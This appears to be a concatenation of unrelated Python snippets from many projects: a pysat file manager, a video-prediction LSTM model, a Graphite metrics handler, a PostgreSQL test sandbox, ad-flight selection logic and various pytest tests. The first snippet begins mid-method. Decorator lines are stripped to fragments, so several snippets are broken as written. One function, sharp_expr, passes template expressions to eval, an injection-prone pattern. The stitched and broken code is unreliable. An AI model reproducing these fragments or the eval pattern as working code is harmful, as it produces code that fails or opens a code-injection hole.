self.inst_info = None
files_copy = copy.deepcopy(self)
self.inst_info = saved_info
files_copy.inst_info = {}
for key in saved_info.keys():
if (key not in ['inst', 'inst_module']):
files_copy.inst_info[key] = copy.deepcopy(self.inst_info[key])
files_copy.inst_info['inst'] = self.inst_info['inst']
files_copy.inst_info['inst_module'] = self.inst_info['inst_module']
return files_copy
def refresh(self):
info_str = '{platform} {name} {tag} {inst_id}'.format(**self.inst_info)
info_str = ' '.join(('pysat is searching for', info_str, 'files.'))
info_str = ' '.join(info_str.split())
pysat.logger.info(info_str)
for path in self.data_paths:
list_files_rtn = self.inst_info['inst']._list_files_rtn
kwarg_inputs = self.inst_info['inst'].kwargs['list_files']
new_files = list_files_rtn(tag=self.inst_info['tag'], inst_id=self.inst_info['inst_id'], data_path=path, format_str=self.file_format, **kwarg_inputs)
if isinstance(new_files, dict):
self.list_files_creator = partial(general.filename_creator, **new_files)
self.start_date = filter_datetime_input(new_files['start_date'])
self.stop_date = filter_datetime_input(new_files['stop_date'])
return
new_files.name = None
if (not new_files.empty):
self.data_path = path
new_files = self._remove_data_dir_path(new_files)
break
pysat.logger.info('Found {:d} local files.'.format(len(new_files)))
if (not new_files.empty):
new_files = new_files.sort_index()
elif pysat.params['warn_empty_file_list']:
pstrs = '\n'.join(self.data_paths)
estr = ''.join(('Unable to find any files that match the supplied ', 'template: ', self.file_format, '\n', 'In the following directories: \n', pstrs))
pysat.logger.warning(estr)
self._attach_files(new_files)
self._store()
return
def set_top_level_directory(self, path):
if (path not in pysat.params['data_dirs']):
estr = "Supplied path not in `pysat.params['data_dirs']`"
raise ValueError(estr)
else:
self.data_path = os.path.join(path, self.sub_dir_path)
return
def get_new(self):
self.refresh()
new_file_series = self._load(update_path=False)
old_file_series = self._load(prev_version=True, update_path=False)
new_files = new_file_series[(- new_file_series.isin(old_file_series))]
return new_files
def get_index(self, fname):
(idx,) = np.where((fname == self.files))
if (len(idx) == 0):
self.refresh()
(idx,) = np.where((fname == np.array(self.files)))
if (len(idx) == 0):
raise ValueError(' '.join(('Could not find "{:}"'.format(fname), 'in available file list. Valid', 'Example:', self.files.iloc[0])))
return idx[0]
def get_file_array(self, start, stop):
starts = pysat.utils.listify(start)
stops = pysat.utils.listify(stop)
files = []
for (sta, stp) in zip(starts, stops):
id1 = self.get_index(sta)
id2 = self.get_index(stp)
files.extend(self.files.iloc[id1:(id2 + 1)])
return files
def from_os(cls, data_path=None, format_str=None, two_digit_year_break=None, delimiter=None):
if (data_path is None):
raise ValueError(' '.join(['Must supply instrument directory path', '(data_path).']))
if (format_str is None):
raise ValueError('Must supply `format_str`.')
search_dict = futils.construct_searchstring_from_format(format_str)
search_str = search_dict['search_string']
files = futils.search_local_system_formatted_filename(data_path, search_str)
if (delimiter is None):
stored = futils.parse_fixed_width_filenames(files, format_str)
else:
stored = futils.parse_delimited_filenames(files, format_str, delimiter)
return futils.process_parsed_filenames(stored, two_digit_year_break) |
def normalize_intersec(i, j, h, w, intersec):
box_num = (len(intersec) // 4)
for x in range(box_num):
intersec[(0 + (4 * x))] = ((intersec[(0 + (4 * x))] - j) / w)
intersec[(2 + (4 * x))] = ((intersec[(2 + (4 * x))] - j) / w)
intersec[(1 + (4 * x))] = ((intersec[(1 + (4 * x))] - i) / h)
intersec[(3 + (4 * x))] = ((intersec[(3 + (4 * x))] - i) / h)
return intersec |
class F28_Authconfig(FC3_Authconfig):
removedKeywords = FC3_Authconfig.removedKeywords
removedAttrs = FC3_Authconfig.removedAttrs
def parse(self, args):
warnings.warn('The authconfig command will be deprecated, use authselect instead.', KickstartDeprecationWarning)
return super(F28_Authconfig, self).parse(args)
def _getParser(self):
op = super(F28_Authconfig, self)._getParser()
op.description += dedent(('\n\n .. versionchanged:: %s\n\n The authconfig program is deprecated. This command will use the\n authconfig compatibility tool, but you should use the authselect\n command instead.\n\n ' % versionToLongString(F28)))
return op |
class Effect11432(BaseEffect):
type = 'passive'
def handler(fit, ship, context, projectionRange, **kwargs):
fit.modules.filteredItemBoost((lambda mod: mod.item.requiresSkill('Repair Systems')), 'armorDamageAmount', ship.getModifiedItemAttr('eliteBonusGunship2'), skill='Assault Frigates', **kwargs) |
def test_player_play_multiple(player):
sources = (SilentTestSource(0.1), SilentTestSource(0.1))
for source in sources:
player.queue(source)
player.play()
player.wait_for_all_events(1.0, 'on_eos', 'on_player_next_source', 'on_eos', 'on_player_eos')
for source in sources:
assert (source.bytes_read == source.max_offset), 'Source not fully played' |
class P2PModel(nn.Module):
def __init__(self, batch_size=100, channels=1, g_dim=128, z_dim=10, rnn_size=256, prior_rnn_layers=1, posterior_rnn_layers=1, predictor_rnn_layers=2, opt=None):
super().__init__()
self.batch_size = batch_size
self.channels = channels
self.g_dim = g_dim
self.z_dim = z_dim
self.rnn_size = rnn_size
self.prior_rnn_layers = prior_rnn_layers
self.posterior_rnn_layers = posterior_rnn_layers
self.predictor_rnn_layers = predictor_rnn_layers
self.opt = opt
self.frame_predictor = lstm_models.lstm((((self.g_dim + self.z_dim) + 1) + 1), self.g_dim, self.rnn_size, self.predictor_rnn_layers, self.batch_size)
self.posterior = lstm_models.gaussian_lstm((((self.g_dim + self.g_dim) + 1) + 1), self.z_dim, self.rnn_size, self.posterior_rnn_layers, self.batch_size)
self.prior = lstm_models.gaussian_lstm((((self.g_dim + self.g_dim) + 1) + 1), self.z_dim, self.rnn_size, self.prior_rnn_layers, self.batch_size)
if (opt.dataset == 'h36m'):
self.encoder = opt.backbone_net.encoder(out_dim=self.g_dim, h_dim=self.g_dim)
self.decoder = opt.backbone_net.decoder(in_dim=self.g_dim, h_dim=self.g_dim)
else:
self.encoder = opt.backbone_net.encoder(self.g_dim, self.channels)
self.decoder = opt.backbone_net.decoder(self.g_dim, self.channels)
opt.optimizer = optim.Adam
self.mse_criterion = nn.MSELoss()
self.kl_criterion = criterion.KLCriterion(opt=self.opt)
self.align_criterion = nn.MSELoss()
self.init_weight()
self.init_optimizer()
def init_optimizer(self):
opt = self.opt
self.frame_predictor_optimizer = opt.optimizer(self.frame_predictor.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))
self.posterior_optimizer = opt.optimizer(self.posterior.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))
self.prior_optimizer = opt.optimizer(self.prior.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))
self.encoder_optimizer = opt.optimizer(self.encoder.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))
self.decoder_optimizer = opt.optimizer(self.decoder.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))
def init_hidden(self, batch_size=1):
self.frame_predictor.hidden = self.frame_predictor.init_hidden(batch_size=batch_size)
self.posterior.hidden = self.posterior.init_hidden(batch_size=batch_size)
self.prior.hidden = self.prior.init_hidden(batch_size=batch_size)
def init_weight(self):
self.frame_predictor.apply(utils.init_weights)
self.posterior.apply(utils.init_weights)
self.prior.apply(utils.init_weights)
self.encoder.apply(utils.init_weights)
self.decoder.apply(utils.init_weights)
def get_global_descriptor(self, x, start_ix=0, cp_ix=None):
if (cp_ix is None):
cp_ix = (len(x) - 1)
x_cp = x[cp_ix]
h_cp = self.encoder(x_cp)[0]
return (x_cp, h_cp)
def p2p_generate(self, x, len_output, eval_cp_ix, start_ix=0, cp_ix=(- 1), model_mode='full', skip_frame=False, init_hidden=True):
opt = self.opt
if (type(x) == tuple):
(pose_2d, pose_3d, camera_view) = x
x = pose_3d
(batch_size, coor, n_dim) = x[0].shape
dim_shape = (coor, n_dim)
else:
(batch_size, channels, h, w) = x[0].shape
dim_shape = (channels, h, w)
gen_seq = [x[0]]
x_in = x[0]
if init_hidden:
self.init_hidden(batch_size=batch_size)
seq_len = len(x)
cp_ix = (seq_len - 1)
(x_cp, global_z) = self.get_global_descriptor(x, cp_ix=cp_ix)
skip_prob = opt.skip_prob
prev_i = 0
max_skip_count = (seq_len * skip_prob)
skip_count = 0
probs = np.random.uniform(0, 1, (len_output - 1))
for i in range(1, len_output):
if ((probs[(i - 1)] <= skip_prob) and (i >= opt.n_past) and (skip_count < max_skip_count) and (i != 1) and (i != (len_output - 1)) and skip_frame):
skip_count += 1
gen_seq.append(torch.zeros_like(x_in))
continue
time_until_cp = torch.zeros(batch_size, 1).fill_((((eval_cp_ix - i) + 1) / eval_cp_ix)).to(x_cp)
delta_time = torch.zeros(batch_size, 1).fill_(((i - prev_i) / eval_cp_ix)).to(x_cp)
prev_i = i
h = self.encoder(x_in)
if (opt.last_frame_skip or (i == 1) or (i < opt.n_past)):
(h, skip) = h
else:
(h, _) = h
h_cpaw = torch.cat([h, global_z, time_until_cp, delta_time], 1).detach()
if (i < opt.n_past):
h_target = self.encoder(x[i])[0]
h_target_cpaw = torch.cat([h_target, global_z, time_until_cp, delta_time], 1).detach()
(zt, _, _) = self.posterior(h_target_cpaw)
(zt_p, _, _) = self.prior(h_cpaw)
if ((model_mode == 'posterior') or (model_mode == 'full')):
self.frame_predictor(torch.cat([h, zt, time_until_cp, delta_time], 1))
elif (model_mode == 'prior'):
self.frame_predictor(torch.cat([h, zt_p, time_until_cp, delta_time], 1))
x_in = x[i]
gen_seq.append(x_in)
else:
if (i < len(x)):
h_target = self.encoder(x[i])[0]
h_target_cpaw = torch.cat([h_target, global_z, time_until_cp, delta_time], 1).detach()
else:
h_target_cpaw = h_cpaw
(zt, _, _) = self.posterior(h_target_cpaw)
(zt_p, _, _) = self.prior(h_cpaw)
if (model_mode == 'posterior'):
h = self.frame_predictor(torch.cat([h, zt, time_until_cp, delta_time], 1))
elif ((model_mode == 'prior') or (model_mode == 'full')):
h = self.frame_predictor(torch.cat([h, zt_p, time_until_cp, delta_time], 1))
x_in = self.decoder([h, skip]).detach()
gen_seq.append(x_in)
return gen_seq
def forward(self, x, start_ix=0, cp_ix=(- 1)):
if (type(x) == tuple):
(pose_2d, pose_3d, camera_view) = x
x = pose_3d
opt = self.opt
batch_size = x[0].shape[0]
self.init_hidden(batch_size=batch_size)
mse_loss = 0
kld_loss = 0
cpc_loss = 0
align_loss = 0
seq_len = len(x)
start_ix = 0
cp_ix = (seq_len - 1)
(x_cp, global_z) = self.get_global_descriptor(x, start_ix, cp_ix)
skip_prob = opt.skip_prob
prev_i = 0
max_skip_count = (seq_len * skip_prob)
skip_count = 0
probs = np.random.uniform(0, 1, (seq_len - 1))
for i in range(1, seq_len):
if ((probs[(i - 1)] <= skip_prob) and (i >= opt.n_past) and (skip_count < max_skip_count) and (i != 1) and (i != cp_ix)):
skip_count += 1
continue
if (i > 1):
align_loss += self.align_criterion(h[0], h_pred)
time_until_cp = torch.zeros(batch_size, 1).fill_((((cp_ix - i) + 1) / cp_ix)).to(x_cp)
delta_time = torch.zeros(batch_size, 1).fill_(((i - prev_i) / cp_ix)).to(x_cp)
prev_i = i
h = self.encoder(x[(i - 1)])
h_target = self.encoder(x[i])[0]
if (opt.last_frame_skip or (i <= opt.n_past)):
(h, skip) = h
else:
h = h[0]
h_cpaw = torch.cat([h, global_z, time_until_cp, delta_time], 1)
h_target_cpaw = torch.cat([h_target, global_z, time_until_cp, delta_time], 1)
(zt, mu, logvar) = self.posterior(h_target_cpaw)
(zt_p, mu_p, logvar_p) = self.prior(h_cpaw)
h_pred = self.frame_predictor(torch.cat([h, zt, time_until_cp, delta_time], 1))
x_pred = self.decoder([h_pred, skip])
if (i == cp_ix):
h_pred_p = self.frame_predictor(torch.cat([h, zt_p, time_until_cp, delta_time], 1))
x_pred_p = self.decoder([h_pred_p, skip])
cpc_loss = self.mse_criterion(x_pred_p, x_cp)
mse_loss += self.mse_criterion(x_pred, x[i])
kld_loss += self.kl_criterion(mu, logvar, mu_p, logvar_p)
loss = ((mse_loss + (kld_loss * opt.beta)) + (align_loss * opt.weight_align))
loss.backward(retain_graph=True)
self.update_model_without_prior()
self.prior.zero_grad()
prior_loss = (kld_loss + (cpc_loss * opt.weight_cpc))
prior_loss.backward()
self.update_prior()
return ((mse_loss.data.cpu().numpy() / seq_len), (kld_loss.data.cpu().numpy() / seq_len), (cpc_loss.data.cpu().numpy() / seq_len), (align_loss.data.cpu().numpy() / seq_len))
def update_prior(self):
self.prior_optimizer.step()
def update_model_without_prior(self):
self.frame_predictor_optimizer.step()
self.posterior_optimizer.step()
self.encoder_optimizer.step()
self.decoder_optimizer.step()
def update_model(self):
self.frame_predictor_optimizer.step()
self.posterior_optimizer.step()
self.prior_optimizer.step()
self.encoder_optimizer.step()
self.decoder_optimizer.step()
def save(self, fname, epoch):
backbone_net = self.opt.backbone_net
self.opt.backbone_net = 0
states = {'encoder': self.encoder.state_dict(), 'decoder': self.decoder.state_dict(), 'frame_predictor': self.frame_predictor.state_dict(), 'posterior': self.posterior.state_dict(), 'prior': self.prior.state_dict(), 'encoder_opt': self.encoder_optimizer.state_dict(), 'decoder_opt': self.decoder_optimizer.state_dict(), 'frame_predictor_opt': self.frame_predictor_optimizer.state_dict(), 'posterior_opt': self.posterior_optimizer.state_dict(), 'prior_opt': self.prior_optimizer.state_dict(), 'epoch': epoch, 'opt': self.opt}
torch.save(states, fname)
self.opt.backbone_net = backbone_net
def load(self, pth=None, states=None):
if (states is None):
states = torch.load(pth)
self.encoder.load_state_dict(states['encoder'])
self.decoder.load_state_dict(states['decoder'])
self.frame_predictor.load_state_dict(states['frame_predictor'])
self.posterior.load_state_dict(states['posterior'])
self.prior.load_state_dict(states['prior'])
self.encoder_optimizer.load_state_dict(states['encoder_opt'])
self.decoder_optimizer.load_state_dict(states['decoder_opt'])
self.frame_predictor_optimizer.load_state_dict(states['frame_predictor_opt'])
self.posterior_optimizer.load_state_dict(states['posterior_opt'])
self.prior_optimizer.load_state_dict(states['prior_opt'])
self.opt = states['opt']
start_epoch = (states['epoch'] + 1)
return start_epoch |
class Link():
__slots__ = ('prev', 'next', 'key', '__weakref__')
def __getstate__(self):
ret = [self.prev(), self.next()]
try:
ret.append(self.key)
except AttributeError:
pass
return ret
def __setstate__(self, state):
self.prev = weakref.ref(state[0])
self.next = weakref.ref(state[1])
if (len(state) == 3):
self.key = state[2] |
def test_setting_logging():
apply_patch_if_needed_and_test_it()
args = Args(logging_verbose=False, logging_debug=False)
run_logging_basic_config(args, {'level': logging.DEBUG})
assert (logging.root.getEffectiveLevel() == logging.DEBUG)
run_logging_basic_config(args, {'level': 'error'})
assert (logging.root.getEffectiveLevel() == logging.ERROR)
run_logging_basic_config(args, {})
assert (logging.root.getEffectiveLevel() == logging.WARNING)
args_verbose = Args(logging_verbose=True, logging_debug=False)
run_logging_basic_config(args_verbose, {})
assert (logging.root.getEffectiveLevel() == logging.INFO)
args_debug = Args(logging_verbose=False, logging_debug=True)
run_logging_basic_config(args_debug, {})
assert (logging.root.getEffectiveLevel() == logging.DEBUG)
run_logging_basic_config(args, {'level': 5})
assert (logging.root.getEffectiveLevel() == 5)
args_both = Args(logging_verbose=True, logging_debug=True)
run_logging_basic_config(args_both, {})
assert (logging.root.getEffectiveLevel() == logging.DEBUG) |
class HostedGraphiteHandler(Handler):
def __init__(self, config=None):
Handler.__init__(self, config)
self.key = self.config['apikey'].lower().strip()
self.graphite = GraphiteHandler(self.config)
def get_default_config_help(self):
config = super(HostedGraphiteHandler, self).get_default_config_help()
config.update({'apikey': 'Api key to use', 'host': 'Hostname', 'port': 'Port', 'proto': 'udp or tcp', 'timeout': '', 'batch': 'How many to store before sending to the graphite server', 'max_backlog_multiplier': 'how many batches to store before trimming', 'trim_backlog_multiplier': 'Trim down how many batches'})
return config
def get_default_config(self):
config = super(HostedGraphiteHandler, self).get_default_config()
config.update({'apikey': '', 'host': 'carbon.hostedgraphite.com', 'port': 2003, 'proto': 'tcp', 'timeout': 15, 'batch': 1, 'max_backlog_multiplier': 5, 'trim_backlog_multiplier': 4})
return config
def process(self, metric):
metric = ((self.key + '.') + str(metric))
self.graphite.process(metric)
def _process(self, metric):
metric = ((self.key + '.') + str(metric))
self.graphite._process(metric)
def _flush(self):
self.graphite._flush()
def flush(self):
self.graphite.flush() |
class AmpCalFitter(BaseGateFitter):
def __init__(self, backend_result, xdata, qubits, fit_p0, fit_bounds):
circuit_names = []
for (cind, _) in enumerate(xdata):
circuit_names.append(('ampcal1Qcircuit_%d_' % cind))
BaseGateFitter.__init__(self, '$AmpCal1Q$', backend_result, xdata, qubits, self._amp_cal_fit, fit_p0, fit_bounds, circuit_names, expected_state='1')
def _amp_cal_fit(x, thetaerr, c):
return AmpCalFitter._cal_fit_fun(x, (- 0.5), thetaerr, thetaerr, (np.pi / 2), (np.pi / 2), c)
def guess_params(self, qind=0):
c = self.ydata['0'][qind]['mean'][0]
theta_err = ((self.ydata['0'][qind]['mean'][0] - self.ydata['0'][qind]['mean'][1]) / 2)
return [theta_err, c]
def angle_err(self, qind=(- 1)):
fitparam = self._get_param(0, qind, series='0', err=False)
return (np.array(fitparam) / 2.0)
def plot(self, qind, series='0', ax=None, show_plot=False):
ax = BaseGateFitter.plot(self, qind, series, ax, show_plot)
return ax |
def test_update_optionset_error(db):
optionset = OptionSet.objects.first()
optionset.locked = True
optionset.save()
option = Option.objects.exclude(optionsets=optionset).first()
with pytest.raises(ValidationError):
OptionLockedValidator(option)({'optionsets': [optionset], 'locked': False}) |
class ChatMemberUpdated(Object, Update):
def __init__(self, *, client: 'pyrogram.Client'=None, chat: 'types.Chat', from_user: 'types.User', date: datetime, old_chat_member: 'types.ChatMember', new_chat_member: 'types.ChatMember', invite_link: 'types.ChatInviteLink'=None):
super().__init__(client)
self.chat = chat
self.from_user = from_user
self.date = date
self.old_chat_member = old_chat_member
self.new_chat_member = new_chat_member
self.invite_link = invite_link
def _parse(client: 'pyrogram.Client', update: Union[('raw.types.UpdateChatParticipant', 'raw.types.UpdateChannelParticipant')], users: Dict[(int, 'raw.types.User')], chats: Dict[(int, 'raw.types.Chat')]) -> 'ChatMemberUpdated':
chat_id = (getattr(update, 'chat_id', None) or getattr(update, 'channel_id'))
old_chat_member = None
new_chat_member = None
invite_link = None
if update.prev_participant:
old_chat_member = types.ChatMember._parse(client, update.prev_participant, users, chats)
if update.new_participant:
new_chat_member = types.ChatMember._parse(client, update.new_participant, users, chats)
if update.invite:
invite_link = types.ChatInviteLink._parse(client, update.invite, users)
return ChatMemberUpdated(chat=types.Chat._parse_chat(client, chats[chat_id]), from_user=types.User._parse(client, users[update.actor_id]), date=utils.timestamp_to_datetime(update.date), old_chat_member=old_chat_member, new_chat_member=new_chat_member, invite_link=invite_link, client=client) |
class Temporal(object):
format_sandbox_id = staticmethod('sandbox{0}_{1}'.format)
cluster_dirname = staticmethod('pg_tmp_{0}_{1}'.format)
cluster = None
_init_pid_ = None
_local_id_ = 0
builtins_keys = {'connector', 'db', 'do', 'xact', 'proc', 'settings', 'prepare', 'sqlexec', 'newdb'}
def __init__(self):
self.builtins_stack = deque()
self.sandbox_id = 0
self.__class__._local_id_ = self.local_id = (self.__class__._local_id_ + 1)
def __call__(self, callable):
def in_pg_temporal_context(*args, **kw):
with self:
return callable(*args, **kw)
n = getattr(callable, '__name__', None)
if n:
in_pg_temporal_context.__name__ = n
return in_pg_temporal_context
def destroy(self):
if (os.getpid() == self._init_pid_):
try:
c = cluster.connection(user='test', database='template1')
with c:
if (c.version_info[:2] <= (9, 1)):
c.sys.terminate_backends()
else:
c.sys.terminate_backends_92()
except Exception:
pass
cluster = self.cluster
self.cluster = None
self._init_pid_ = None
if (cluster is not None):
cluster.stop()
cluster.wait_until_stopped(timeout=5)
cluster.drop()
def init(self, installation_factory=installation.default, inshint={'hint': 'Try setting the PGINSTALLATION environment variable to the `pg_config` path'}):
if ((self.cluster is not None) or ('PGTEST' in os.environ)):
return
self._init_pid_ = os.getpid()
atexit.register(self.destroy)
self.cluster_path = os.path.join(os.environ.get('HOME', os.getcwd()), self.cluster_dirname(self._init_pid_, self.local_id))
self.logfile = os.path.join(self.cluster_path, 'logfile')
installation = installation_factory()
if (installation is None):
raise ClusterError('could not find the default pg_config', details=inshint)
vi = installation.version_info
cluster = Cluster(installation, self.cluster_path)
if cluster.initialized():
cluster.drop()
cluster.encoding = 'utf-8'
cluster.init(user='test', encoding=cluster.encoding, logfile=None)
try:
self.cluster_port = find_available_port()
except:
raise ClusterError('could not find a port for the test cluster on localhost', creator=cluster)
if (vi[:2] > (9, 6)):
cluster.settings['max_wal_senders'] = '0'
cluster.settings.update(dict(port=str(self.cluster_port), max_connections='20', shared_buffers='200', listen_addresses='localhost', log_destination='stderr', log_min_messages='FATAL', max_prepared_transactions='10'))
if (installation.version_info[:2] < (9, 3)):
cluster.settings.update(dict(unix_socket_directory=cluster.data_directory))
else:
cluster.settings.update(dict(unix_socket_directories=cluster.data_directory))
with open(self.logfile, 'w') as lfo:
cluster.start(logfile=lfo)
cluster.wait_until_started()
c = cluster.connection(user='test', database='template1')
with c:
c.execute('create database test')
self.cluster = cluster
def push(self):
if ('PGTEST' in os.environ):
from . import open as pg_open
c = pg_open(os.environ['PGTEST'])
else:
c = self.cluster.connection(user='test')
c.connect()
extras = []
sbid = self.format_sandbox_id(os.getpid(), (self.sandbox_id + 1))
def new_pg_tmp_connection(l=extras, clone=c.clone, sbid=sbid):
l.append(clone())
l[(- 1)].settings['search_path'] = ((str(sbid) + ',') + l[(- 1)].settings['search_path'])
return l[(- 1)]
local_builtins = {'db': c, 'prepare': c.prepare, 'xact': c.xact, 'sqlexec': c.execute, 'do': c.do, 'settings': c.settings, 'proc': c.proc, 'connector': c.connector, 'new': new_pg_tmp_connection}
if (not self.builtins_stack):
current = {k: builtins.__dict__[k] for k in self.builtins_keys if (k in builtins.__dict__)}
self.builtins_stack.append((current, []))
self.builtins_stack.append((local_builtins, extras))
builtins.__dict__.update(local_builtins)
self.sandbox_id += 1
def pop(self, exc, drop_schema='DROP SCHEMA {0} CASCADE'.format):
(local_builtins, extras) = self.builtins_stack.pop()
self.sandbox_id -= 1
if (len(self.builtins_stack) > 1):
builtins.__dict__.update(self.builtins_stack[(- 1)][0])
else:
previous = self.builtins_stack.popleft()
for x in self.builtins_keys:
if (x in previous):
builtins.__dict__[x] = previous[x]
else:
builtins.__dict__.pop(x, None)
if ((exc is None) or isinstance(exc, Exception)):
for xdb in ([local_builtins['db']] + list(extras)):
if (xdb.closed is False):
xdb.interrupt()
xdb.close()
xdb = local_builtins['db']
with xdb.clone() as c:
c.execute(drop_schema(self.format_sandbox_id(os.getpid(), (self.sandbox_id + 1))))
else:
pass
def _init_c(self, cxn):
cxn.connect()
sb = self.format_sandbox_id(os.getpid(), self.sandbox_id)
cxn.execute(('CREATE SCHEMA ' + sb))
cxn.settings['search_path'] = ','.join((sb, cxn.settings['search_path']))
def __enter__(self):
if (self.cluster is None):
self.init()
self.push()
try:
self._init_c(builtins.db)
except Exception as e:
self.pop(e)
raise
def __exit__(self, exc, val, tb):
self.pop(val) |
def test_setitem(stream):
df = pd.DataFrame({'x': list(range(10)), 'y': ([1] * 10)})
sdf = DataFrame(example=df.iloc[:0], stream=stream)
stream = sdf.stream
sdf['z'] = (sdf['x'] * 2)
sdf['a'] = 10
sdf[['c', 'd']] = sdf[['x', 'y']]
L = sdf.mean().stream.gather().sink_to_list()
stream.emit(df.iloc[:3])
stream.emit(df.iloc[3:7])
stream.emit(df.iloc[7:])
df['z'] = (df['x'] * 2)
df['a'] = 10
df[['c', 'd']] = df[['x', 'y']]
wait_for((lambda : (L and L[(- 1)].equals(df.mean()))), 1) |
_benchmark.command(name='analyze')
_option
_range_option
('--datetime', '-d', 'datetime_range', help="Filter execution progress plot to contain data within the specified datetime range, e.g '2021-11-16T10:00:00-2021-11-16T11:00:00'", type=str, callback=(lambda c, p, v: _to_datetime_range(v)))
('--title', '-t', help='Title of the generated plots.', type=str, callback=(lambda c, p, v: (v if (v is not None) else c.params['workflow'])))
('--interval', '-i', help='Ticks interval in seconds for execution progress plot', type=int)
def analyze_command(workflow: str, workflow_range: Tuple[(int, int)], datetime_range: Tuple[(str, str)], title: str, interval: Optional[int]) -> NoReturn:
plot_params = {'title': title, 'time_interval': interval, 'datetime_range': datetime_range}
try:
analyze(workflow, workflow_range, plot_params)
except Exception as e:
logger.error(f'Something went wrong when analyzing results: {e}') |
_if_fails
def test_parameter_generators(n_evaluations=100):
for generator_type in [RandomParameterOptimizer, RegressionParameterOptimizer, SubgridParameterOptimizer, AnnealingParameterOptimizer]:
for maximize in [True, False]:
(yield (check_optimizer, generator_type, maximize, n_evaluations)) |
('pypyr.moduleloader.get_module')
(Step, 'invoke_step')
def test_run_pipeline_steps_complex_swallow_false(mock_invoke_step, mock_get_module):
step = Step({'name': 'step1', 'swallow': False})
context = get_test_context()
original_len = len(context)
with patch_logger('pypyr.dsl', logging.DEBUG) as mock_logger_debug:
step.run_step(context)
mock_logger_debug.assert_any_call('done')
mock_invoke_step.assert_called_once_with(context={'key1': 'value1', 'key2': 'value2', 'key3': 'value3', 'key4': [{'k4lk1': 'value4', 'k4lk2': 'value5'}, {'k4lk1': 'value6', 'k4lk2': 'value7'}], 'key5': False, 'key6': True, 'key7': 77})
assert (len(context) == original_len) |
def configureLogging():
logformatNoColor = '%(levelname)-3s -: %(message)s'
level = logging.WARNING
formatter = logging.Formatter(logformatNoColor, datefmt=None)
stream = logging.StreamHandler()
stream.setFormatter(formatter)
root = logging.getLogger()
root.setLevel(level)
root.addHandler(stream) |
def sharp_expr(extr, expr):
try:
expr = extr.expand(expr)
expr = re.sub('(?<![!<>])=', '==', expr)
expr = re.sub('mod', '%', expr)
expr = re.sub('\x08div\x08', '/', expr)
expr = re.sub('\x08round\x08', '|ROUND|', expr)
return text_type(eval(expr))
except:
return ('<span class="error">%s</span>' % expr) |
class ScheduleItemAttendee(TimeStampedModel):
schedule_item = models.ForeignKey(ScheduleItem, on_delete=models.CASCADE, verbose_name=_('schedule item'), related_name='attendees')
user = models.ForeignKey('users.User', on_delete=models.CASCADE, null=False, blank=False, verbose_name=_('user'), related_name='+')
class Meta():
unique_together = ('user', 'schedule_item') |
def make_mating_pool(population_mol: List[Mol], population_scores, offspring_size: int):
sum_scores = sum(population_scores)
population_probs = [(p / sum_scores) for p in population_scores]
mating_pool = np.random.choice(population_mol, p=population_probs, size=offspring_size, replace=True)
return mating_pool |
class ProbabilisticFlightBackend(AdvertisingEnabledBackend):
def select_flight(self):
flights = self.get_candidate_flights()
paid_flights = []
affiliate_flights = []
community_flights = []
publisher_house_flights = []
house_flights = []
for flight in flights:
if (flight.campaign.campaign_type == PAID_CAMPAIGN):
paid_flights.append(flight)
elif (flight.campaign.campaign_type == AFFILIATE_CAMPAIGN):
affiliate_flights.append(flight)
elif (flight.campaign.campaign_type == COMMUNITY_CAMPAIGN):
community_flights.append(flight)
elif (flight.campaign.campaign_type == PUBLISHER_HOUSE_CAMPAIGN):
publisher_house_flights.append(flight)
else:
house_flights.append(flight)
if (flights and (self.ad_slug or self.campaign_slug)):
return random.choice(flights)
for possible_flights in (paid_flights, affiliate_flights, community_flights, publisher_house_flights, house_flights):
flight_range = []
total_clicks_needed = 0
for flight in possible_flights:
if (not self.filter_flight(flight)):
continue
if any(((flight.clicks_needed_this_interval() > 0), (flight.views_needed_this_interval() > 0))):
weighted_clicks_needed_this_interval = flight.weighted_clicks_needed_this_interval(self.publisher)
flight_range.append([total_clicks_needed, (total_clicks_needed + weighted_clicks_needed_this_interval), flight])
total_clicks_needed += weighted_clicks_needed_this_interval
choice = random.randint(0, total_clicks_needed)
for (min_clicks, max_clicks, flight) in flight_range:
if (min_clicks <= choice <= max_clicks):
return flight
return None
def get_ad_ctr_weight(self, ad):
weights = {0.075: 1, 0.1: 2, 0.125: 3, 0.15: 4}
ad_weighting = 0
for (threshold, weight) in weights.items():
if ((ad.sampled_ctr >= threshold) and (weight > ad_weighting)):
ad_weighting = weight
return ad_weighting
def select_ad_for_flight(self, flight):
if (not flight):
return None
chosen_ad = None
weighted_ad_choices = []
if self.ad_slug:
candidate_ads = flight.advertisements.filter(slug=self.ad_slug)
else:
candidate_ads = flight.advertisements.filter(live=True, ad_types__slug__in=self.ad_types)
candidate_ads = candidate_ads.select_related('flight').prefetch_related('ad_types')
for advertisement in candidate_ads:
placement = self.get_placement(advertisement)
if (not placement):
log.warning("Couldn't find a matching ad placement. ad=%s, placements=%s", advertisement, self.placements)
continue
priority = placement.get('priority', 1)
if flight.prioritize_ads_ctr:
priority += self.get_ad_ctr_weight(advertisement)
for _ in range(priority):
weighted_ad_choices.append(advertisement)
if weighted_ad_choices:
chosen_ad = random.choice(weighted_ad_choices)
else:
log.warning('Chosen flight has no matching live ads! flight=%s, ad_types=%s', flight, self.ad_types)
return chosen_ad |
def add_bb_into_image(image, bb, color=(255, 0, 0), thickness=2, label=None):
r = int(color[0])
g = int(color[1])
b = int(color[2])
font = cv2.FONT_HERSHEY_SIMPLEX
fontScale = 0.5
fontThickness = 1
(x1, y1, x2, y2) = bb.getAbsoluteBoundingBox(BBFormat.XYX2Y2)
x1 = int(x1)
y1 = int(y1)
x2 = int(x2)
y2 = int(y2)
cv2.rectangle(image, (x1, y1), (x2, y2), (b, g, r), thickness)
if (label is not None):
(tw, th) = cv2.getTextSize(label, font, fontScale, fontThickness)[0]
(xin_bb, yin_bb) = ((x1 + thickness), ((y1 - th) + int((12.5 * fontScale))))
if ((yin_bb - th) <= 0):
yin_bb = (y1 + th)
r_Xin = (x1 - int((thickness / 2)))
r_Yin = ((y1 - th) - int((thickness / 2)))
cv2.rectangle(image, (r_Xin, (r_Yin - thickness)), (((r_Xin + tw) + (thickness * 3)), ((r_Yin + th) + int((12.5 * fontScale)))), (b, g, r), (- 1))
cv2.putText(image, label, (xin_bb, yin_bb), font, fontScale, (0, 0, 0), fontThickness, cv2.LINE_AA)
return image |
class Space(metaclass=MetaSpace):
_stored_dims = {}
